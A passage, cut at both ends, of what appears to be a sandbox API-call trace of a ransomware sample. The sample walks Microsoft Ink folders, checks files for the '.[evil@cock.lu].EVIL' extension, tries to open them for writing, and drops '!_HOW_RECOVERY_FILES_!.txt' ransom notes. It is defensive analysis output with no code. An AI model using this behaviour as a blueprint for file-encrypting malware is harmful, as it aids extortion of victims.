_SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.562] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\..") returned 76 [0088.562] wcscmp (_String1=".", _String2="..") returned -1 [0088.562] wcscmp (_String1="..", _String2="..") returned 0 [0088.563] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.563] wcsstr (_Str="oskpredbase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.563] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 89 [0088.563] wcscmp (_String1="oskpredbase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.563] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oskpredbase.xml") returned 0x0 [0088.563] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 0x59 [0088.563] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.563] GetLastError () returned 0x5 [0088.563] FindNextFileW (in: hFindFile=0x84b11dd440, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.563] FindClose (in: hFindFile=0x84b11dd440 | out: hFindFile=0x84b11dd440) returned 1 [0088.563] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred") returned 0x49 [0088.563] strlen (_Str="${KEY}") returned 0x6 [0088.563] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.563] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.563] strlen (_Str="${CODE}") returned 0x7 [0088.563] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.563] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.563] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.563] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.564] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.564] __uncaught_exception () returned 0x84b1160800 [0088.564] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.564] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.564] wcsstr (_Str="oskpred.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.565] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml") returned 77 [0088.565] wcscmp (_String1="oskpred.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.565] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="oskpred.xml") returned 0x0 [0088.565] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml") returned 0x4d [0088.565] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.565] GetLastError () returned 0x5 [0088.565] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.565] wcsstr (_Str="symbols", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.565] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 73 [0088.565] wcscmp (_String1=".", _String2="symbols") returned -1 [0088.565] wcscmp (_String1="..", _String2="symbols") returned -1 [0088.565] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 0x49 [0088.565] wcscpy_s (in: _Destination=0x84b0fdd730, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 0x0 [0088.565] wcscat (in: _Dest=0x84b0fdd730, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*" [0088.565] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0x84b11ddaa0 [0088.565] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.565] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.") returned 75 [0088.565] wcscmp (_String1=".", _String2=".") returned 0 [0088.565] FindNextFileW (in: hFindFile=0x84b11ddaa0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.565] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.565] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\..") returned 76 [0088.565] wcscmp (_String1=".", _String2="..") returned -1 [0088.565] wcscmp (_String1="..", _String2="..") returned 0 [0088.565] FindNextFileW (in: hFindFile=0x84b11ddaa0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.565] wcsstr (_Str="ea-sym.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.565] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 84 [0088.565] wcscmp (_String1="ea-sym.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.565] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ea-sym.xml") returned 0x0 [0088.565] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 0x54 [0088.566] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.566] GetLastError () returned 0x5 [0088.566] FindNextFileW (in: hFindFile=0x84b11ddaa0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.566] wcsstr (_Str="ja-jp-sym.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.566] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 87 [0088.566] wcscmp (_String1="ja-jp-sym.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.566] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ja-jp-sym.xml") returned 0x0 [0088.566] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 0x57 [0088.566] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.566] GetLastError () returned 0x5 [0088.566] FindNextFileW (in: hFindFile=0x84b11ddaa0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 1 [0088.566] wcsstr (_Str="symbase.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.566] _snwprintf (in: _Dest=0x84b0fdd730, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 85 [0088.566] wcscmp (_String1="symbase.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.566] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="symbase.xml") returned 0x0 [0088.566] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned 0x55 [0088.566] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.567] GetLastError () returned 0x5 [0088.567] FindNextFileW (in: hFindFile=0x84b11ddaa0, lpFindFileData=0x84b0fdd4e0 | out: lpFindFileData=0x84b0fdd4e0) returned 0 [0088.567] FindClose (in: hFindFile=0x84b11ddaa0 | out: hFindFile=0x84b11ddaa0) returned 1 [0088.567] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 0x49 [0088.567] strlen (_Str="${KEY}") returned 0x6 [0088.567] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.567] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.567] strlen (_Str="${CODE}") returned 0x7 [0088.567] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.567] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.567] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.567] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.567] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.567] __uncaught_exception () returned 0x84b1160800 [0088.567] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.568] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.568] wcsstr (_Str="symbols.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.568] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml") returned 77 [0088.568] wcscmp (_String1="symbols.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.568] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="symbols.xml") returned 0x0 [0088.568] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml") returned 0x4d [0088.568] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.568] GetLastError () returned 0x5 [0088.568] FindNextFileW (in: hFindFile=0x84b11dd560, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.568] FindClose (in: hFindFile=0x84b11dd560 | out: hFindFile=0x84b11dd560) returned 1 [0088.569] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 0x41 [0088.569] strlen (_Str="${KEY}") returned 0x6 [0088.569] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.569] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.569] strlen (_Str="${CODE}") returned 0x7 [0088.569] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.569] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.569] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.569] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.569] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.569] __uncaught_exception () returned 0x84b1160800 [0088.569] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.570] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.570] wcsstr (_Str="he-IL", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.570] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 57 [0088.570] wcscmp (_String1=".", _String2="he-IL") returned -1 [0088.570] wcscmp (_String1="..", _String2="he-IL") returned -1 [0088.570] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 0x39 [0088.570] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 0x0 [0088.570] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*" [0088.570] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd380 [0088.570] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.570] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\.") returned 59 [0088.570] wcscmp (_String1=".", _String2=".") returned 0 [0088.570] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.571] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.571] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\..") returned 60 [0088.571] wcscmp (_String1=".", _String2="..") returned -1 [0088.571] wcscmp (_String1="..", _String2="..") returned 0 [0088.571] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.571] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.571] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui") returned 73 [0088.571] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.571] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.571] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui") returned 0x49 [0088.571] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.571] GetLastError () returned 0x5 [0088.571] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.571] FindClose (in: hFindFile=0x84b11dd380 | out: hFindFile=0x84b11dd380) returned 1 [0088.571] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL") returned 0x39 [0088.571] strlen (_Str="${KEY}") returned 0x6 [0088.571] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.571] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.571] strlen (_Str="${CODE}") returned 0x7 [0088.571] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.571] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.571] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.571] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.572] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.572] __uncaught_exception () returned 0x84b1160800 [0088.572] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.573] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.573] wcsstr (_Str="hr-HR", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.573] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 57 [0088.573] wcscmp (_String1=".", _String2="hr-HR") returned -1 [0088.573] wcscmp (_String1="..", _String2="hr-HR") returned -1 [0088.573] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 0x39 [0088.573] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 0x0 [0088.573] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*" [0088.573] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddb00 [0088.573] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.573] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\.") returned 59 [0088.573] wcscmp (_String1=".", _String2=".") returned 0 [0088.573] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.573] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.573] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\..") returned 60 [0088.573] wcscmp (_String1=".", _String2="..") returned -1 [0088.573] wcscmp (_String1="..", _String2="..") returned 0 [0088.573] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.573] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.573] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui") returned 73 [0088.573] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.573] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.573] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui") returned 0x49 [0088.573] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.573] GetLastError () returned 0x5 [0088.573] FindNextFileW (in: hFindFile=0x84b11ddb00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.573] FindClose (in: hFindFile=0x84b11ddb00 | out: hFindFile=0x84b11ddb00) returned 1 [0088.574] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR") returned 0x39 [0088.574] strlen (_Str="${KEY}") returned 0x6 [0088.574] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.574] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.574] strlen (_Str="${CODE}") returned 0x7 [0088.574] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.574] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.574] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.574] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.574] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.574] __uncaught_exception () returned 0x84b1160800 [0088.575] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.575] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.575] wcsstr (_Str="hu-HU", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.575] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 57 [0088.575] wcscmp (_String1=".", _String2="hu-HU") returned -1 [0088.575] wcscmp (_String1="..", _String2="hu-HU") returned -1 [0088.575] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 0x39 [0088.575] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU") returned 0x0 [0088.575] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*" [0088.575] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dde00 [0088.576] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.576] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\.") returned 59 [0088.576] wcscmp (_String1=".", _String2=".") returned 0 [0088.576] FindNextFileW (in: hFindFile=0x84b11dde00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.576] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.576] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\..") returned 60 [0088.576] wcscmp (_String1=".", _String2="..") returned -1 [0088.576] wcscmp (_String1="..", _String2="..") returned 0 [0088.576] FindNextFileW (in: hFindFile=0x84b11dde00, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.576] wcsstr (_Str="tipresx.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.576] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui") returned 73 [0088.576] wcscmp (_String1="tipresx.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.576] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tipresx.dll.mui") returned 0x0 [0088.576] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui") returned 0x49 [0088.576] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 